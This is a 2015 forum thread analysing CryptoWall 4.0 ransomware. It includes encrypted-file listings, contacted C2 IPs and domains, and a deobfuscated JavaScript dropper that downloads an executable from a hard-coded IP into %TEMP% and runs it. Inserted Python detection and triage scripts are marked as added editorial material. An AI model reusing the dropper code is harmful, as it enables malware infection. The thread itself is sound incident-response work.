CryptoWall 4.0: Help_Your_Files Ransomware Support Topic


433 replies to this topic

#16 Passkeycs

  • Members
  • 6 posts

Posted 03 November 2015 - 12:15 PM

Found out which user.  No signs of a virus.  No local files encrypted??  Only server drives.  "Resume" email.  Any idea what we are looking for to clean?  We have a good backup...  Whew.




#17 Passkeycs

  • Members
  • 6 posts

Posted 03 November 2015 - 12:18 PM

Closer look.  The files that look to have been glossed over are xls.xlsx?  Probably user error on a save.



#18 Passkeycs

  • Members
  • 6 posts

Posted 03 November 2015 - 12:19 PM

Noticing appdata\roaming\random folder\randomfile.exe



#19 PresComm

  • Topic Starter
  • Members
  • 109 posts

Posted 03 November 2015 - 12:21 PM

Pass, yes, saw that, too. I bet if you check your startup items in msconfig.exe, you will see that .EXE as a startup item, too. TDSSKiller caught it for us.



#20 Grinler

    Lawrence Abrams

  • Admin
  • 43,612 posts

Posted 03 November 2015 - 12:23 PM

Yes, this uses a .JS file to download and execute a file from the %temp% folder.

#21 Grinler

    Lawrence Abrams

  • Admin
  • 43,612 posts

Posted 03 November 2015 - 12:25 PM

C2 server identical to cryptowall. May be new variant.

#22 PresComm

  • Topic Starter
  • Members
  • 109 posts

Posted 03 November 2015 - 12:26 PM

Grinler, yeah, I am already referring to it as CryptoWall 4.0 in my internal documentation. I used the file decrypter service and everything. Architecture looks exactly the same.



#23 White Hat Mike

  • Members
  • 312 posts

Posted 03 November 2015 - 12:43 PM

PresComm -- does it change file extensions of affected files?  Before I look closer...


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#24 PresComm

  • Topic Starter
  • Members
  • 109 posts

Posted 03 November 2015 - 12:46 PM

WHM, yes it does. 

Example of a dir command run where some files are located:

11/02/2015  13:12            14,076 0ausbffwh.p5
11/02/2015  13:12            13,740 0d06g.m4
11/02/2015  13:12            12,124 183d0z3a1i.3g
11/02/2015  13:12           148,812 2uxg648.22y1
11/02/2015  13:12            31,612 49517u9.ezys3
11/02/2015  13:12           520,268 4a1l2xzl2.12v
11/02/2015  13:12            22,892 4m0dqf714.18pj
11/02/2015  13:12            13,324 5ixmq7v.8h
11/02/2015  13:12            13,052 72lcvn.iv6nn
11/02/2015  13:12            13,388 787izcrv.9paf3
11/02/2015  13:12            12,620 k4f2h18h.e6
11/02/2015  13:12        23,664,912 ki2cy7qckg.w0m
11/02/2015  13:12             9,724 l3it1yb8.u44s0
11/02/2015  13:12            14,540 mebb96c2xc.d8s9v
11/02/2015  13:12            12,364 oze14izm3z.r8wj2
11/02/2015  13:12            33,148 u1s9iuwutx.pf3wo
11/02/2015  13:12            39,788 x83o8x.ux7
11/02/2015  13:12            14,316 xae9y5.7g0c
11/02/2015  13:12            20,412 zc7pu7p2h.220rc
11/02/2015  13:12            13,932 zr9nwvf7.id9v

Edited by PresComm, 03 November 2015 - 12:46 PM.
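Defender-side illustration, added here and not part of PresComm's post: a small Python script that parses `dir` output like the listing above and flags a directory in which most file names have been replaced by random base names with non-standard extensions, the renaming pattern the listing shows. The four flagged sample lines are copied from the post; the three normal-looking entries, the allowlist of expected extensions and the 50% threshold are constructed assumptions for this example.

```python
import re

# Sample `dir` output. The first four lines are copied from the listing in the post above;
# the last three are constructed, normal-looking entries added for contrast.
SAMPLE_DIR_OUTPUT = """\
11/02/2015  13:12            14,076 0ausbffwh.p5
11/02/2015  13:12            13,740 0d06g.m4
11/02/2015  13:12           148,812 2uxg648.22y1
11/02/2015  13:12        23,664,912 ki2cy7qckg.w0m
11/02/2015  13:12            41,210 Q3_budget.xlsx
11/02/2015  13:12           120,004 board_minutes.docx
11/02/2015  13:12             2,048 notes.txt
"""

# date  time  size  name  (file entries only; <DIR> rows would not match and are skipped)
DIR_LINE = re.compile(r"^(\S+)\s+(\S+)\s+([\d,]+)\s+(.+?)\s*$")

# Extensions a defender expects on a typical file share (assumption for this example).
KNOWN_EXTENSIONS = {"xls", "xlsx", "doc", "docx", "pdf", "txt", "ppt", "pptx",
                    "jpg", "png", "csv", "zip", "exe", "dll"}


def parse_dir_line(line):
    """Return a dict for one `dir` file entry, or None if the line is not an entry."""
    m = DIR_LINE.match(line)
    if not m:
        return None
    date, time, size, name = m.groups()
    return {"date": date, "time": time, "size": int(size.replace(",", "")), "name": name}


def _mixed(s):
    return any(ch.isdigit() for ch in s) and any(ch.isalpha() for ch in s)


def looks_renamed(name):
    """Heuristic: base name mixing letters and digits plus a short alphanumeric extension
    that is not on the allowlist, i.e. the pattern visible in the thread's listing."""
    if "." not in name:
        return False
    base, ext = name.rsplit(".", 1)
    ext = ext.lower()
    if ext in KNOWN_EXTENSIONS:
        return False
    return _mixed(base) and 1 <= len(ext) <= 6 and re.fullmatch(r"[a-z0-9]+", ext) is not None


def score_listing(text, threshold=0.5):
    """Parse a whole `dir` listing and report how much of it matches the renaming pattern."""
    entries = [e for e in (parse_dir_line(l) for l in text.splitlines()) if e]
    flagged = [e["name"] for e in entries if looks_renamed(e["name"])]
    ratio = len(flagged) / len(entries) if entries else 0.0
    return {"total": len(entries), "flagged": flagged, "ratio": ratio,
            "suspicious": ratio >= threshold}


if __name__ == "__main__":
    result = score_listing(SAMPLE_DIR_OUTPUT)
    print("%d of %d entries look renamed -> suspicious=%s"
          % (len(result["flagged"]), result["total"], result["suspicious"]))
```

Run against a share where a user has write access, a high ratio in one directory is a useful trigger for isolating that user's workstation before the rest of the tree is touched; the allowlist should be tuned to the extensions actually present on the share to keep false positives down.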


#25 White Hat Mike

  • Members
  • 312 posts

Posted 03 November 2015 - 01:11 PM

Interesting.  Outside of the ZIP file, do you have the executable file that it downloads that carries out the actual encryption routine?  It should be within %TEMP%.

 

Executing the JS file in two different environments results in several errors...  it seems like the author's JS is sloppy/miscoded, and/or the payload file it uses XMLHttpRequest to send a GET to retrieve no longer exists (or has likely moved).

 

Quick Overview

 

  • Nearly FUD at this time; 1 AV engine in VirusTotal flags this JS file as malicious (Symantec).

  • Performs a GET request to retrieve the payload file from 46.30.45.110 on Port 80

  • JavaScript looks like it was run through a beautifier / obfuscator, obfuscation isn't very complex

  • IP address it requests to download payload file belongs to the Russian Federation

And here is a more cleaned up version of the JS code:

 

(function(dataAndEvents) {
  /**
   * @param {string} xdomain
   * @return {?}
   */
  function request(xdomain) {
    return new dataAndEvents.ActiveXObject(xdomain);
  }
  /** @type {boolean} */
  var QAKDHaz = true;
  /** @type {string} */
  var curPort = "DB.Stream";
  var doRequest;
  /**
   * @param {string} url
   * @param {(Node|string)} scope
   * @param {number} deepDataAndEvents
   * @return {undefined}
   */
  doRequest = function(url, scope, deepDataAndEvents) {
    var req = request("WScript" + (1229173, ".Shell"));
    var xhr = request("MSXML2.XMLHTTP");
    /** @type {string} */
    var nonStripName = "%TEMP%\\";
    scope = req.ExpandEnvironmentStrings(nonStripName) + scope;
    /**
     * @return {?}
     */
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4) {
        /** @type {boolean} */
        QAKDHaz = false;
        with(request("ADO" + curPort)) {
          open();
          /** @type {number} */
          type = 1;
          write(xhr.ResponseBody);
          saveToFile(scope, 2);
          close();
          return scope;
        }
      }
    };
    xhr.open("G" + (3882399, 462019, "ET"), url, false);
    xhr.send();
    for (;QAKDHaz;) {
      dataAndEvents.WScript.Sleep(1E3);
    }
    if (new Date > 0, 7125) {
      req.Run(scope, 0, 0);
    }
  };
  doRequest("http://46.30.45." + "110/anali" + "tics.e" + "x" + "e", "160967872.exe", 1);
})(this);

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com
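Static triage of the downloader quoted above, written as an added example for this thread rather than anything Mike posted or ran: the script never executes the JavaScript. It undoes the two cheap obfuscations visible in the listing (comma expressions such as `(1229173, ".Shell")`, which evaluate to their last operand, and strings split into `+`-joined pieces, after inlining variables that hold one string literal) so that the download URL, the dropped file name and the WScript.Shell / MSXML2.XMLHTTP / ADODB.Stream chain can be matched with plain regular expressions. The embedded excerpt is reduced to the relevant lines of the quoted code; the indicator list and the verdict labels are this example's own assumptions.

```python
import re

# Excerpt of the Windows Script Host downloader quoted in the post above, reduced to the
# lines that matter for static triage. The URL and file name are the page's indicators;
# nothing here is executed, only pattern-matched.
DROPPER_EXCERPT = r'''
function request(xdomain) { return new dataAndEvents.ActiveXObject(xdomain); }
var curPort = "DB.Stream";
var req = request("WScript" + (1229173, ".Shell"));
var xhr = request("MSXML2.XMLHTTP");
var nonStripName = "%TEMP%\\";
with(request("ADO" + curPort)) { open(); type = 1; write(xhr.ResponseBody); saveToFile(scope, 2); close(); }
xhr.open("G" + (3882399, 462019, "ET"), url, false);
req.Run(scope, 0, 0);
doRequest("http://46.30.45." + "110/anali" + "tics.e" + "x" + "e", "160967872.exe", 1);
'''

# (123, 456, "lit")  ->  "lit"   (JavaScript comma operator yields the last operand)
COMMA_TRICK = re.compile(r'\(\s*(?:-?\d+\s*,\s*)+("[^"]*")\s*\)')
# "ab" + "cd"  ->  "abcd"
LITERAL_CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
# var name = "literal";   (only single-literal assignments are inlined)
VAR_LITERAL = re.compile(r'\bvar\s+([A-Za-z_$][\w$]*)\s*=\s*"([^"]*)"\s*;')


def normalize(js):
    """Collapse comma tricks, inline string-literal variables, then join split literals
    until nothing changes. Returns the rewritten source text."""
    js = COMMA_TRICK.sub(lambda m: m.group(1), js)
    for name, value in VAR_LITERAL.findall(js):
        js = re.sub(r'(?<![\w$.])' + re.escape(name) + r'(?![\w$])',
                    lambda m, v=value: '"%s"' % v, js)
    while True:
        new = LITERAL_CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), js)
        if new == js:
            return js
        js = new


# Indicator patterns applied to the normalized text (this example's own list).
INDICATORS = {
    "wscript_shell": r'"WScript\.Shell"',
    "xmlhttp": r'"MSXML2\.XMLHTTP"',
    "adodb_stream": r'"ADODB\.Stream"',
    "temp_dir": r'%TEMP%',
    "save_to_file": r'\bsaveToFile\s*\(',
    "run": r'\.Run\s*\(',
}
URL = re.compile(r'https?://[^\s"\'<>]+')
EXE_NAME = re.compile(r'"([\w-]+\.exe)"')


def triage(js):
    """Return indicators, reconstructed URLs, bare .exe names and a verdict for a script."""
    text = normalize(js)
    hits = {k: bool(re.search(p, text)) for k, p in INDICATORS.items()}
    # fetch over HTTP + write via ADODB.Stream + Run is the download-and-execute chain
    chain = hits["xmlhttp"] and hits["adodb_stream"] and hits["run"]
    verdict = "dropper" if chain else ("suspicious" if any(hits.values()) else "clean")
    return {"indicators": hits, "urls": URL.findall(text),
            "exe_names": EXE_NAME.findall(text), "verdict": verdict}


if __name__ == "__main__":
    report = triage(DROPPER_EXCERPT)
    print(report["verdict"], report["urls"], report["exe_names"])
```

The normalize step generalizes to other WSH droppers that rely on the same two tricks, which is why it is separated from the indicator matching; variables assigned from expressions rather than literals (like `req` and `xhr` here) are deliberately not resolved, so a sample that builds its ProgIDs at run time would still need a sandbox rather than this static pass.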


#26 PresComm

  • Topic Starter
  • Members
  • 109 posts

Posted 03 November 2015 - 01:18 PM

I do not. Unfortunately, as stated previously, the technicians that responded didn't really pay mind to forensics before they blasted the machine with anti-x tools.

 

If all else fails, I will infect my sandbox with it and get a copy of it that way. If I do, want me to upload it to Mega again and get you the link?



#27 White Hat Mike

  • Members
  • 312 posts

Posted 03 November 2015 - 01:21 PM

> I do not. Unfortunately, as stated previously, the technicians that responded didn't really pay mind to forensics before they blasted the machine with anti-x tools.
>
> If all else fails, I will infect my sandbox with it and get a copy of it that way. If I do, want me to upload it to Mega again and get you the link?

 

Yes please -- I executed it on Win 2003 and Win 2008, ran it through a sandbox, and each time the 2nd stage payload couldn't be retrieved...  Not sure if the hard-coded URL is still active.


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#28 PresComm

  • Topic Starter
  • Members
  • 109 posts

Posted 03 November 2015 - 01:21 PM

Never mind. Found "analitics.exe" on Malwr. Uploading it to Mega and shooting PM.



#29 White Hat Mike

  • Members
  • 312 posts

Posted 03 November 2015 - 01:26 PM

> Never mind. Found "analitics.exe" on Malwr. Uploading it to Mega and shooting PM.

 

Yep that's the dropper.  I didn't look for it on MALWR yet, I'll check it out when you PM me.


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#30 White Hat Mike

  • Members
  • 312 posts

Posted 03 November 2015 - 01:44 PM

analitics.exe

 

Contacted Domains / IPs

  • 66.7.210.114 (adcconsulting.net, abelindia.com)
  • 173.237.136.250 (myshop.lk)
  • 103.27.61.200 (httthanglong.com)
  • 103.224.22.13 (ks0407.com)
  • 184.168.47.225 (successafter60.com, purposenowacademy.com)
  • 104.28.9.242 (localburialinsuranceinfo.com)
  • 143.95.52.38 (kingalter.com)

Edited by White Hat Mike, 03 November 2015 - 01:46 PM.

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com
